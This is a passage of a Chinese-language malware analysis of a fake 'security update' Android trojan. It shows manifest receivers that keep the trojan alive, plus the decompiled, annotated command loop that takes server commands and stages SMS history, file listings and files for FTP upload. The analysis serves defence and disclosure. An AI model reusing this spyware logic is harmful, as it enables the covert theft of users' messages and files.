<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.AUDIO_BECOMING_NOISY" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.SCO_AUDIO_STATE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.media.action.CLOSE_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.media.action.OPEN_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.SMS_REJECTED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED" />
<action android:name="android.speech.tts.engine.TTS_DATA_INSTALLED" />
</intent-filter>
</receiver>
<!-- .AlarmReceiver: no intent-filter, so it is reachable only by an explicit intent; the
     analysis below describes .UploadService arming it through a timer (alarm). -->
<receiver android:name=".AlarmReceiver" />
<!-- .UploadService: declares a custom action and no android:exported attribute, so on Android
     versions before 12 it is exported by default and any installed app could start it.
     Android 12+ refuses to install a component that has an intent-filter but no explicit
     android:exported value. -->
<service android:name=".UploadService">
<intent-filter>
<action android:name="UploadService" />
</intent-filter>
</service>
<!-- .ServerControlActivity: MAIN action without a LAUNCHER category, so no home-screen icon is
     created, which fits the "security update" disguise. The swiftp_name label hints at reused
     SwiFTP server code (inferred from the resource name only), consistent with the FTP upload
     the analysis below describes in HttpFileUploader. -->
<activity android:theme="@*android:style/Theme.NoTitleBar" android:label="@string/swiftp_name" android:name=".ServerControlActivity" android:launchMode="singleInstance" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
可以看到.StartService广播接收器注册了大量的系统广播,这样可以保证程序的长期运行。通过配置文件可以看出,该程序只有 .StartService一个程序入口点。
2、分析程序代码
恶意代码树如下:
.StartService组件完成.UploadService服务启动,并调用HttpFileUploader.runInit方法,具体代码如下:
.UploadService服务注册定时器启动.AlarmReceiver广播接收器,并保存注册结果到文件。具体代码如下:
.AlarmReceiver和.StartService一样也会调用HttpFileUploader.runInit方法。具体代码如下:
现在所有的分析工作都应该聚焦在HttpFileUploader.runInit方法。在分析的过程中不再对具体的方法进行进一步展开分析。
/**
 * Command loop of the decompiled HttpFileUploader (analyst annotations only; the code is left
 * exactly as the decompiler emitted it).
 *
 * Per the original analysis: the method asks the server for one command via getControls(),
 * materialises the requested data as files under this.UPLOADFOLDER, and then calls tryUpload()
 * to push that folder over FTP. The file "Data.dat" (read and written through
 * getContextValue/setContextValue) acts as a "last command handled" marker so that the same
 * command+path is not processed twice.
 *
 * NOTE(review): the while(true) / continue / statements-after-return shape is a decompiler
 * artifact. Read literally, every `continue` jumps back to tryUpload() and the end of the loop
 * body also falls back to it, so the effective order is presumably: run the matching command
 * branch, then tryUpload(), then return — confirm against the smali before relying on it.
 */
public void runIt()
{
// getControls(): contacts the server and fetches the command. Format: line 1 = the command,
// line 2 = the path whose file listing is wanted. The command is returned; the path is stored
// in this.path.
String str1 = getControls();
// fetchListing(): recursively walks this.path and collects information on every file below it.
String str2 = str1 + ":" + fetchListing(this.path, "", 0) + ":" + this.path;
// "clearFileList": wipe this.UPLOADFOLDER. Nothing in this branch writes "clearFileList" into
// Data.dat, so as decompiled the guard never trips and the folder is deleted on every such command.
if (str1.equals("clearFileList"))
if (!getContextValue("Data.dat").equals("clearFileList"))
delTempFolder(this.UPLOADFOLDER);
while (true)
{
// Logs in to the FTP server and uploads every file under this.UPLOADFOLDER.
tryUpload();
return;
// "getDir": store the listing built above as "FileList.txt" + path ('/' -> '_') in this.UPLOADFOLDER.
if (str1.equals("getDir"))
{
// Same command+listing already handled.
if (getContextValue("Data.dat").equals(str2))
continue;
try
{
String str7 = "FileList.txt" + this.path.replace('/', '_');
File localFile5 = new File(this.UPLOADFOLDER + str7);
if (!localFile5.exists())
{
BufferedWriter localBufferedWriter3 = new BufferedWriter(new FileWriter(localFile5));
localBufferedWriter3.write(str2);
localBufferedWriter3.close();
}
setContextValue("Data.dat", str2);
}
catch (Exception localException3)
{
// Swallowed: a failed write leaves no trace and the Data.dat marker is not updated.
}
}
// "clearAlarm": request a timer re-arm by writing "Reset" into alarmIsSet.dat. Note that Data.dat
// is not updated here either, so the guard above never trips from this branch.
if (str1.equals("clearAlarm"))
{
if (getContextValue("Data.dat").equals("clearAlarm"))
continue;
setContextValue("alarmIsSet.dat", new String("Reset"));
}
// "getTexts": dump the SMS/MMS history into this.UPLOADFOLDER (getTextHistory); skipped while the
// marker still reads "GotTexts".
if (str1.equals("getTexts"))
{
if (getContextValue("Data.dat").equals("GotTexts"))
continue;
getTextHistory();
setContextValue("Data.dat", "GotTexts");
}
// "getFile": copy the file named by this.path into this.UPLOADFOLDER and record its size.
if (str1.equals("getFile"))
{
if (getContextValue("Data.dat").equals("getFile" + this.path))
continue;
try
{
File localFile2 = new File(this.path);
File localFile3 = new File(this.UPLOADFOLDER + localFile2.getName());
if (!localFile3.exists())
{
copyToUploadFolder(localFile2);
String str5 = getSize(localFile3.getAbsolutePath());
// NOTE(review): this replaces '\\', whereas the getDir branch replaces '/'. On a '/'-separated
// path the separators stay in the file name, so the FileWriter below presumably fails into the
// empty catch — would explain missing SizeRet files on the server; confirm.
String str6 = "SizeRet.txt" + this.path.replace('\\', '_');
File localFile4 = new File(this.UPLOADFOLDER + str6);
if (!localFile4.exists())
{
BufferedWriter localBufferedWriter2 = new BufferedWriter(new FileWriter(localFile4));
localBufferedWriter2.write(str5);
localBufferedWriter2.close();
}
}
setContextValue("Data.dat", "getFile" + this.path);
}
catch (Exception localException2)
{
// Swallowed; the marker is not set when the copy or write fails.
}
}
// "getSize": write the size of this.path to "SizeRet.txt" + path in this.UPLOADFOLDER. The marker
// check is combined into the condition; no setContextValue follows, so it never trips from here.
if ((!str1.equals("getSize")) || (getContextValue("Data.dat").equals("getSize" + this.path)))
continue;
try
{
String str3 = getSize(this.path);
// Same '\\' vs '/' remark as in the getFile branch.
String str4 = "SizeRet.txt" + this.path.replace('\\', '_');
File localFile1 = new File(this.UPLOADFOLDER + str4);
// The trailing ';' makes this guard an empty statement: unlike the other branches, the file is
// rewritten on every getSize command.
if (!localFile1.exists());
BufferedWriter localBufferedWriter1 = new BufferedWriter(new FileWriter(localFile1));
localBufferedWriter1.write(str3);
localBufferedWriter1.close();
}
catch (Exception localException1)
{
// Swallowed.
}
}
}
通过分析,HttpFileUploader.runIt方法具体的工作就是连接服务器获取指令,然后把获取的信息以文件的形式存放到上传目录,并把上传目录下的所有文件上传到ftp服务器。
通过ftp客户端登录服务器,可以看到已有大量感染该病毒用户的隐私信息被上传。
通过访问该恶意站点,可以发现该站点还可以感染PC平台,它能够根据用户不同的操作系统下发不同的木马程序。攻击平台包括Windows、Mac和Unix/Linux。
四、相关链接
http://blog.trustgo.com/fakelookout/
http://www.cnbeta.com/articles/210425.htm